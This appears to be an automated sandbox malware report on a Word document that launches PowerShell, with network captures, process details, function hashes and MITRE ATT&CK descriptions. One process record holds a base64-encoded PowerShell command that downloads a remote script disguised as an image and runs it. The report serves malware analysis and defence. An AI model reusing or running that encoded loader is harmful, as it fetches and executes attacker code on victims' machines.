2025-01-01 16:20:31 UTC	1347	IN	HTTP/1.1 404 Not Found Date: Wed, 01 Jan 2025 16:20:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private CF-Cache-Status: BYPASS Set-Cookie: XSRF-TOKEN=eyJpdiI6IjQrc0RseUMxMVNYbzRKcStOeWZBR2c9PSIsInZhbHVlIjoicGNMaUJCd0VQRy9XeXdweGlGd21pSXByeFVtZ0NRVUd6TlNvRmJHZmRDYXpuWWZUcmY2Wkp0T2p0UTF2cEpLZHo4SmJTU0toc1RqTERMYitJRTJWWHZRM1RzUTJZdmEzMzRWVVhINC9kU09tQ3pucjN0UmZGY1VLMDV5a2lmdFUiLCJtYWMiOiIxZTA3OGY0NTJlZTViNjczNWI5YzViNDY1MWFmZWU2M2IzZDE3NGE2MDU2NWYxNjVjMWVjNTg4NjE3NGJmMjYyIn0%3D; expires=Wed, 01-Jan-2025 18:20:31 GMT; Max-Age=7200; path=/; samesite=lax Set-Cookie: tmpfiles_session=eyJpdiI6ImpYRmVGUmhaUk5MYUsyWENUazhjQ0E9PSIsInZhbHVlIjoiT3RBMERGQjlIZDdVT3RNZC9qdVltVjgxY2U1OG5abG9mS2I3VXhzNlVyM20zYXM3Y2JLazY4WTJ0REpMTGFUWk1EZUxxWm9DaXVUU3RHYkpCZ3RtTWV4Y2JaZlhUNlJvTWQ5dW9OUWRWeFdNeTFPdDZOejJpY2ppamp1TVJHdEYiLCJtYWMiOiJjMGRjY2RhNjczMWVkY2RhMGQ0YTc2ODkyMGZjZGJlYTVjNWUyZjY3MDI5NzdhMzExZjk4NGRlZmExNGQzZTczIn0%3D; expires=Wed, 01-Jan-2025 18:20:31 GMT; Max-Age=7200; path=/; httponly; samesite=lax Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nvnI1siVhe%2FYN0il8eoEss2DGDEb1rUqwuETgaf%2FW%2B%2B6skOqmyagABnG%2BvEgBr%2FWjkkvmpjmQ2Kdju0dNxJ1YNTYWoOjlOcuhkl7iAXdo8BvcsH2ylg%2Bl7NC%2FSI2DoI%3D"}],"group":"cf-nel","max_age":604800}
2025-01-01 16:20:31 UTC	362	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 62 33 64 36 34 63 62 39 39 62 30 66 38 39 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 36 39 26 6d 69 6e 5f 72 74 74 3d 31 34 36 32 26 72 74 74 5f 76 61 72 3d 35 36 33 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fb3d64cb99b0f89-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1462&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_b
2025-01-01 16:20:31 UTC	1369	IN	Data Raw: 31 39 64 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 Data Ascii: 19d1<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> ... Fonts --> <link rel="preconnect" href="ht
2025-01-01 16:20:31 UTC	1369	IN	Data Raw: 23 65 64 66 32 66 37 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 33 37 2c 32 34 32 2c 32 34 37 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 6f 72 64 65 72 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 3a 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 62 64 35 65 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 33 2c 32 31 33 2c 32 32 34 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 62 6f 72 64 65 72 2d 74 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 7d 2e 62 6f 72 64 65 72 2d 72 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 31 70 78 7d 2e 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e Data Ascii: #edf2f7;border-color:rgba(237,242,247,var(--border-opacity))}.border-gray-400{--border-opacity:1;border-color:#cbd5e0;border-color:rgba(203,213,224,var(--border-opacity))}.border-t{border-top-width:1px}.border-r{border-right-width:1px}.flex{display:flex}.
2025-01-01 16:20:31 UTC	1369	IN	Data Raw: 72 61 79 2d 33 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 65 32 65 38 66 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 32 36 2c 32 33 32 2c 32 34 30 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 74 65 78 74 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 63 62 64 35 65 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 33 2c 32 31 33 2c 32 32 34 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 74 65 78 74 2d 67 72 61 79 2d 35 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 61 30 61 65 63 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 31 36 30 2c 31 37 34 2c 31 39 32 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 Data Ascii: ray-300{--text-opacity:1;color:#e2e8f0;color:rgba(226,232,240,var(--text-opacity))}.text-gray-400{--text-opacity:1;color:#cbd5e0;color:rgba(203,213,224,var(--text-opacity))}.text-gray-500{--text-opacity:1;color:#a0aec0;color:rgba(160,174,192,var(--text-op
2025-01-01 16:20:31 UTC	1369	IN	Data Raw: 7a 69 65 72 28 2e 38 2c 30 2c 31 2c 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 38 2c 30 2c 31 2c 31 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 2c 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 30 2c 2e 32 2c 31 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 20 62 6f 75 6e 63 65 7b 30 25 2c 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 32 35 25 29 3b 2d 77 65 62 Data Ascii: zier(.8,0,1,1);animation-timing-function:cubic-bezier(.8,0,1,1)}50%{transform:translateY(0);-webkit-animation-timing-function:cubic-bezier(0,0,.2,1);animation-timing-function:cubic-bezier(0,0,.2,1)}}@keyframes bounce{0%,to{transform:translateY(-25%);-web
2025-01-01 16:20:31 UTC	1141	IN	Data Raw: 28 2d 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 37 30 30 7b 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 3a 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 34 61 35 35 36 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 37 34 2c 38 35 2c 31 30 34 2c 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 74 65 78 74 2d 77 68 69 74 65 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2e 64 61 72 6b 5c 3a 74 65 78 74 2d 67 72 61 79 2d 34 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 Data Ascii: (--bg-opacity))}.dark\:border-gray-700{--border-opacity:1;border-color:#4a5568;border-color:rgba(74,85,104,var(--border-opacity))}.dark\:text-white{--text-opacity:1;color:#fff;color:rgba(255,255,255,var(--text-opacity))}.dark\:text-gray-400{--text-opacity
2025-01-01 16:20:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:20:22
Start date:	01/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0xa30000
File size:	1'620'872 bytes
MD5 hash:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:20:28
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
Imagebase:	0x20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:20:28
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 06F61D20 Relevance: 5.6, Strings: 4, Instructions: 650COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06F62068
4'jq, xrefs: 06F621C2
4'jq, xrefs: 06F621B8
4'jq, xrefs: 06F6205E

Memory Dump Source

Source File: 00000006.00000002.2138090506.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f60000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq
API String ID: 0-4000621977
Opcode ID: 1e1f6acec8d67ebeb10b9177536775bc6ee04bd1e7522b01756bf9aa9c988d65
Instruction ID: cad108792fbf27d3ad5a69834cde71b45ab64f9a04ce31084277d5cbb2ac4126
Opcode Fuzzy Hash: 1e1f6acec8d67ebeb10b9177536775bc6ee04bd1e7522b01756bf9aa9c988d65
Instruction Fuzzy Hash: 93225771F043058FD7A59B6E841177BBBA2EFC1721F14846AE905CB292DB32CA41C7E1

Function 06F60488 Relevance: 2.7, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06F6058D
4'jq, xrefs: 06F60599

Memory Dump Source

Source File: 00000006.00000002.2138090506.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f60000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: e4a68f4d459eb63e4799a523394594da5cc2c567276de3378fd6df76178941e2
Instruction ID: 8cce93c72c8805afd83291f1e4cb7e0fd3662e667bc8a23135b91ec9d704bca5
Opcode Fuzzy Hash: e4a68f4d459eb63e4799a523394594da5cc2c567276de3378fd6df76178941e2
Instruction Fuzzy Hash: EF511831F443048FDBA56B7A862037E7BA6AFC1214F64406BE845CB292DE76CC85C7A1

Function 06F60469 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06F6058D

Memory Dump Source

Source File: 00000006.00000002.2138090506.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f60000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: c2ec958826c406cf1c8e7c045faf8e3a84ee76abe47e7f7cceb33505a4a66aac
Instruction ID: 6f1f16b3b39f69bc08ee011bfa5421aa3bed28d25a23532dbb0f449c390430ab
Opcode Fuzzy Hash: c2ec958826c406cf1c8e7c045faf8e3a84ee76abe47e7f7cceb33505a4a66aac
Instruction Fuzzy Hash: 5431D331E453049FDBB19B2A861077E7BE1AF81214F64406AF844CB192EF75CD81C7A1

Function 046729F0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2132269127.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7138b099b596b6da2ac3e585c85f6f0cb9d8e4fdf8259ee5dc0b62681fd32842
Instruction ID: 6a7e1e4fa185501f59e8e93931789c112f96eb82bfe3dd0ccfaba4673683103f
Opcode Fuzzy Hash: 7138b099b596b6da2ac3e585c85f6f0cb9d8e4fdf8259ee5dc0b62681fd32842
Instruction Fuzzy Hash: 5C919A74A002098FCB15CF59C5A49AEFBB1FF88310B248699D915AB3A5D735FC91CBA0

Function 06F61D01 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2138090506.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33dd11324b90237920f9566ae3d85cda877052db89551d3aedd91fd02d6a0ad6
Instruction ID: c1c285fde11251577f345dab2964625af201748e57f1834435bd51781deabe4d
Opcode Fuzzy Hash: 33dd11324b90237920f9566ae3d85cda877052db89551d3aedd91fd02d6a0ad6
Instruction Fuzzy Hash: 96412371E143008FCBA1DF6E8500ABA7BB3EF96614B1884AAF944DB242C731D841C7A1

Function 04672B00 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2132269127.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a050edfe98ef6f31fdf9da1704ce0bc371a545db99207424efb0f26f4197af80
Instruction ID: 628ae7eac6e8b2987584b0291152821d1afa24b4011c15a788fe9aedd0ede1f9
Opcode Fuzzy Hash: a050edfe98ef6f31fdf9da1704ce0bc371a545db99207424efb0f26f4197af80
Instruction Fuzzy Hash: 534147B4A001058FCB05CF59C1A8AAEFBB1FF48314B2585A9D915AB364D732FC91CBA0

Function 04674810 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2132269127.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fc1e08981c9142304f38a11b1bce8665da91597f6c3469b4960e704382fd860
Instruction ID: 1a9423ee3060ce01ec5e5d94ecea105108c9842435b2124a502cd4cf0936c2c9
Opcode Fuzzy Hash: 5fc1e08981c9142304f38a11b1bce8665da91597f6c3469b4960e704382fd860
Instruction Fuzzy Hash: 02213B74A042598FCB00CF99C5849AEBBB5FF89300B158596E815EB352D735FD41CBA1

Function 04674800 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2132269127.0000000004670000.00000040.00000800.00020000.00000000.sdmp, Offset: 04670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4670000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 904efaa8db5bcd15e9c74c9d1ddb1b7198eac1d9f685642c99caf296d9f4e13b
Instruction ID: 1ed1966a7b08a67985fe34e7d9b6aaf2bd654cf4768ad42a55458afb1c3258dc
Opcode Fuzzy Hash: 904efaa8db5bcd15e9c74c9d1ddb1b7198eac1d9f685642c99caf296d9f4e13b
Instruction Fuzzy Hash: DA1117B4E0020A9FCB00CF99D584AAAFBB5FF89310B108555E909AB351D735FC41CBA1

Function 0452D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2131985092.000000000452D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0452D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_452d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93dfa028f620bc48d9b6ff5327843f0613aa00bdb8697d17f1468bfbd8ac2ee4
Instruction ID: eb61a33082e2fbb1262b4850be88a9c9f00b24b3a0d9d998aa5c47968dbc9e2a
Opcode Fuzzy Hash: 93dfa028f620bc48d9b6ff5327843f0613aa00bdb8697d17f1468bfbd8ac2ee4
Instruction Fuzzy Hash: A00120311053149AD7208F16EE84B67BFA8FF47320F18C417DD484B1D6E279A845D6B1

Function 0452D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2131985092.000000000452D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0452D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_452d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4d4e92fe0b01ebea090666e1779f152f664c9246fdfe876d11e1accad4d9a75
Instruction ID: f8982053fbf0fac18b0bffb3ebc182d7cb8c83016f034848a634af75d504c0a7
Opcode Fuzzy Hash: e4d4e92fe0b01ebea090666e1779f152f664c9246fdfe876d11e1accad4d9a75
Instruction Fuzzy Hash: D3014C6100E3D09EE7128B259D94A52BFB4EF43224F19C1DBD9888F2A3D2699849D772

Non-executed Functions

Function 06F61380 Relevance: 9.2, Strings: 7, Instructions: 481COMMON

Download Yara Rule

Strings

4'jq, xrefs: 06F615E7
$jq, xrefs: 06F61392
4'jq, xrefs: 06F615F1
$jq, xrefs: 06F613C4
$jq, xrefs: 06F613B8
tPjq, xrefs: 06F61409
tPjq, xrefs: 06F613FD

Memory Dump Source

Source File: 00000006.00000002.2138090506.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f60000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq
API String ID: 0-2919996211
Opcode ID: 7c97d66517a7baebbea538ee50c1b196dc26d4703739b721218e88e75709a780
Instruction ID: 6c5a1c30fcbc172843e81443877e68e2288e0cbe4e97d9d06233780ca54766d0
Opcode Fuzzy Hash: 7c97d66517a7baebbea538ee50c1b196dc26d4703739b721218e88e75709a780
Instruction Fuzzy Hash: D1F13672F042148FDB94DB6ED41067ABBE6EFC5721F14806AE906CB291DB32DC45C7A1

Function 06F606D0 Relevance: 9.1, Strings: 7, Instructions: 313COMMON

Download Yara Rule

Strings

tPjq, xrefs: 06F6091D
$jq, xrefs: 06F608D8
$jq, xrefs: 06F608B2
tPjq, xrefs: 06F60929
4'jq, xrefs: 06F607D3
$jq, xrefs: 06F608E4
4'jq, xrefs: 06F607DF

Memory Dump Source

Source File: 00000006.00000002.2138090506.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f60000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq
API String ID: 0-2919996211
Opcode ID: 62a726e5f2de82936a9b72e6385050e4b9adf5f517c0d7c0a8051056ab9d106d
Instruction ID: e8ae55f15e8dd231139ac1609e9fc064092d024323adcef983faed95ad1f87c1
Opcode Fuzzy Hash: 62a726e5f2de82936a9b72e6385050e4b9adf5f517c0d7c0a8051056ab9d106d
Instruction Fuzzy Hash: 40A15B32F083158FD7A59A7A961067ABBA6DFC5620B24407FE945CB391DE32CC41C7E1

Function 06F63520 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$jq, xrefs: 06F63588
$jq, xrefs: 06F6354E
$jq, xrefs: 06F63532
$jq, xrefs: 06F6357C

Memory Dump Source

Source File: 00000006.00000002.2138090506.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f60000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$$jq$$jq
API String ID: 0-2428501249
Opcode ID: 9b160a1dbeb4171be59bcd1c8c3d152cc8e4248710152d45c9fb7bb8dc3c9ced
Instruction ID: 931b82dc4ea190080f359ef3468f55ce7caf41eb5b6ffb4f9f004f1e43dc19dc
Opcode Fuzzy Hash: 9b160a1dbeb4171be59bcd1c8c3d152cc8e4248710152d45c9fb7bb8dc3c9ced
Instruction Fuzzy Hash: E821F633F503065FDBA4966F9854B37A696DFC1721F64942AB906C7381DE32CC41C3A1

Function 06F60309 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

$jq, xrefs: 06F6035E
4'jq, xrefs: 06F6037F
$jq, xrefs: 06F60352
4'jq, xrefs: 06F60373

Memory Dump Source

Source File: 00000006.00000002.2138090506.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f60000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq
API String ID: 0-1496060811
Opcode ID: b23a451a2ee0967097ed4b9459a88fd9277d1b95e4138e5342c2c799b5f59318
Instruction ID: 0345a197d79e81c49b3e82508a1ef5fb90c80a155018d2e504852fd971e7975e
Opcode Fuzzy Hash: b23a451a2ee0967097ed4b9459a88fd9277d1b95e4138e5342c2c799b5f59318
Instruction Fuzzy Hash: 6A01B111A4E3D64FC36B16291921626BFB69FC351072A44DBE8C0DF297CE558C49C3A7

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

